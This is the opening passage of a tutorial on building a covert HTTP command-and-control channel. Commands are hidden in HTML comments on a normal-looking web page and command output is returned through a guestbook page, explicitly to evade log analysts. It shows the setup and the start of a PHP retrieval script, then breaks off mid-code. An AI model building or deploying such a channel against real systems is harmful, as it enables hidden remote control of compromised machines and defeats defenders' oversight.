Creating an HTTP C2
The issue with brazenly presenting your commands in URLs is that even a half-asleep log analyst will spot it. There are multiple methods of hiding requests, but when you don't know what the response text is going to look like, you need to provide a solid method of disguising the output and returning it to your server.
We will create a script that masks command and control activities as HTTP traffic, takes commands from comments on a web page, and returns the output into a guestbook.
Getting Started
For this, you will need a functioning web server with two pages, one to host your comments and one to host your retrieval page.
Your comment page should just have standard content. For this, I'm using the Nginx default home page and adding comments to it at the end. A comment should be expressed as:
<!--cmdgoeshere-->
The retrieval page can be as simple as:
<?php $host='localhost'; $username='user'; $password='password'; $db_name="data"; $tbl_name="data"; $comment = $_REQUEST...
